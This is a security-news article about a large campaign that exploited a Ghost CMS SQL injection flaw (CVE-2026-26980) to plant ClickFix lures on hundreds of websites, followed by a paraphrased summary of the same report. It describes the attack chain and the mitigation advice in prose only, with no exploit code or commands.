Ghost CMS SQL injection flaw exploited in large-scale ClickFix campaign

Recorded: May 24, 2026, 2:57 p.m.

Original

News

Featured
Latest

Microsoft warns of new Defender zero-days exploited in attacks

GitHub confirms breach of 3,800 repos via malicious VSCode extension

Hackers bypass SonicWall VPN MFA due to incomplete patching

Flipper One project needs community help to build open Linux platform

Ghost CMS SQL injection flaw exploited in large-scale ClickFix campaign

AdGuard’s lifetime ad blocker for nine devices is just $16

Laravel Lang packages hijacked to deploy credential-stealing malware

Italy disrupts CINEMAGOAL piracy app that stole streaming auth codes

Tutorials

Latest
Popular

How to access the Dark Web using the Tor Browser

How to enable Kernel-mode Hardware-enforced Stack Protection in Windows 11

How to use the Windows Registry Editor

How to backup and restore the Windows Registry

How to start Windows in Safe Mode

How to remove a Trojan, Virus, Worm, or other Malware

How to show hidden files in Windows 7

How to see hidden files in Windows

Webinars
Downloads

Latest
Most Downloaded

Qualys BrowserCheck

STOPDecrypter

AuroraDecrypter

FilesLockerDecrypter

AdwCleaner

ComboFix

RKill

Junkware Removal Tool

Deals

Categories

eLearning

IT Certification Courses

Gear + Gadgets

Security

VPNs

Popular

Best VPNs

How to change IP address

Access the dark web safely

Best VPN for YouTube

Forums
More

Virus Removal Guides
Startup Database
Uninstall Database
Glossary
Send us a Tip!
Welcome Guide

HomeNewsSecurityGhost CMS SQL injection flaw exploited in large-scale ClickFix campaign

Ghost CMS SQL injection flaw exploited in large-scale ClickFix campaign

By Bill Toulas

May 24, 2026
10:12 AM
0

A large-scale campaign is exploiting a critical SQL injection vulnerability (CVE-2026-26980) in Ghost CMS to inject malicious JavaScript code that triggers ClickFix attack flows.
The campaign was discovered by XLab threat intelligence researchers at Chinese cybersecurity company Qianxin, who confirmed impact on more than 700 domains, including university portals, AI/SaaS companies, media outlets, fintech firms, security sites, and personal blogs.
According to the researchers, threat actors planted malicious code on the websites of Harvard University, Oxford University, Auburn University, and DuckDuckGo.

Compromised sitesSource: XLab

CVE-2026-26980 impacts Ghost 3.24.0 through 6.19.0, and allows unauthenticated attackers to read arbitrary data from the website database, including the admin API keys.
This key gives management access to users, articles, and themes, and can be used to modify article pages.
Although the fix for the issue was released on February 19 in Ghost CMS version 6.19.1, many sites failed to install the security update.
SentinelOne published on February 27 details about CVE-2026-26980 being exploited in attacks and how incidents can be detected. The researchers observed at least two distinct activity clusters targeting vulnerable Ghost sites, sometimes re-infecting the same domains with different scripts after cleanup, or one cleaning the script of the other to inject its own.

Timeline of the attacksSource: XLab
Attack chain
The attacks that XLab observed begin by exploiting CVE-2026-26980 to steal the admin API keys, and then use the elevated rights to inject malicious JavaScript into articles.
The JavaScript code is a lightweight loader that fetches second-stage code from the attacker’s infrastructure, which is essentially a cloaking script that fingerprints visitors to determine whether they qualify as targets.
Visitors passing the verification are served a fake Cloudflare prompt loaded via an iframe on top of the article page, which contains the ClickFix lure.

The ClickFix pageSource: XLab
The page instructs victims to verify that they are human by pasting a provided command on their Windows command prompt, which drops a payload on their systems.
XLab has observed multiple payloads being used in these attacks, including DLL loaders, JavaScript droppers, and an Electron-based malware sample named UtilifySetup.exe.

Attack phasesSource: XLab
Mitigating the risk
The most important course of action for Ghost CMS website administrators is to upgrade to version 6.19.1 or later and rotate all keys used previously, as they may have been exposed.
XLab provided a list of indicators of compromise (IoCs), including injected scripts, so a thorough review of the websites is needed to locate and remove them.
The researchers recommend that website owners maintain a 30-day record of admin API call logs to enable a reliable retrospective investigation.

The Validation Gap: Automated Pentesting Answers One Question. You Need Six.

Automated pentesting tools deliver real value, but they were built to answer one question: can an attacker move through the network? They were not built to test whether your controls block threats, your detection rules fire, or your cloud configs hold.This guide covers the 6 surfaces you actually need to validate.
Download Now

Related Articles:
Drupal: Critical SQL injection flaw now targeted in attacksHackers are exploiting a critical LiteLLM pre-auth SQLi flawHackers bypass SonicWall VPN MFA due to incomplete patchingHackers exploit auth bypass flaw in Burst Statistics WordPress pluginWeaver E-cology critical bug exploited in attacks since March

Actively Exploited
ClickFix
Ghost CMS
Social Engineering
SQL Injection
Vulnerability

Bill Toulas
Bill Toulas is a tech writer and infosec news reporter with over a decade of experience working on various online publications, covering open-source, Linux, malware, data breach incidents, and hacks.

Popular Stories

Microsoft warns of new Defender zero-days exploited in attacks

Ubiquiti patches three max severity UniFi OS vulnerabilities

Google accidentally exposed details of unfixed Chromium flaw

Sponsor Posts

Protect Your Business from Ecommerce Fraud

Managing Shadow AI: 5 Steps to Secure Employee AI Use Without Killing Productivity

33% Rise in Healthcare Credential Theft in 2025: What you need to know

Patch management isn't enough. See why privilege is defining security risk today.

Overdue a password health-check? Audit your Active Directory for free

Upcoming Webinar

Main Sections

News
Webinars
VPN Buyer Guides
SysAdmin Software Guides
Downloads
Virus Removal Guides
Tutorials
Startup Database
Uninstall Database
Glossary

Community

Forums
Forum Rules
Chat

Useful Resources

Welcome Guide
Sitemap

Company

About BleepingComputer
Contact Us
Send us a Tip!
Advertising
Write for BleepingComputer
Social & Feeds
Changelog

Username

Password

Remember Me

Not a member yet? Register Now

Reporter

Help us understand the problem. What is going on with this comment?

Spam

Abusive or Harmful

Inappropriate content

Strong language

Other

Read our posting guidelinese to learn what content is prohibited.

Submitting...
SUBMIT

A large-scale cyber campaign exploited a critical SQL injection vulnerability, identified as CVE-2026-26980, present in Ghost CMS, to deploy malicious JavaScript code that initiated ClickFix attack flows. This exploitation was investigated by XLab threat intelligence researchers from the Chinese cybersecurity company Qianxin, who determined the vulnerability impacted more than 700 distinct domains, including academic portals, AI and SaaS companies, media outlets, fintech firms, security sites, and personal blogs, with specific examples including Harvard University, Oxford University, Auburn University, and DuckDuckGo.

The vulnerability in Ghost CMS versions 3.24.0 through 6.19.0 allowed unauthenticated attackers to read arbitrary data from the website's database, including sensitive administrative API keys. These API keys provided attackers with elevated management access, enabling them to modify user information, articles, and themes. Although a security patch was released in Ghost CMS version 6.19.1 on February 19, many affected sites failed to implement this security update, leaving the vulnerability open to exploitation. SentinelOne detailed in their report on February 27 how this specific vulnerability was actively exploited in attacks and how such incidents can be detected. Researchers observed distinct activity clusters targeting vulnerable Ghost sites where malicious scripts were sometimes re-injected or one script was used to clean the other before injecting its own code.

The attack chain initiated by threat actors involved several sophisticated stages. Initially, the attackers leveraged CVE-2026-26980 to successfully exfiltrate admin API keys. With these elevated privileges, they injected malicious JavaScript designed to function as a lightweight loader and cloaking script, which served to fingerprint visitors to determine if they represented targets. Visitors who passed this verification process were then presented with a fake Cloudflare prompt loaded via an iframe on the article page, serving as the ClickFix lure. This lure page instructed victims to execute a command on their Windows command prompt to download a payload onto their systems. The observed payloads included DLL loaders, JavaScript droppers, and an Electron-based malware sample named UtilifySetup.exe.

For website administrators of Ghost CMS, the primary course of action to mitigate this risk involves immediately upgrading to version 6.19.1 or later and ensuring that all previously used administrative keys are rotated. Furthermore, a thorough review of the websites is necessary to locate and remove any injected scripts, as identified by the indicators of compromise (IoCs) provided by the researchers. The researchers also recommended that website owners maintain a thirty-day record of all administrative API call logs to facilitate a reliable retrospective investigation should an incident occur.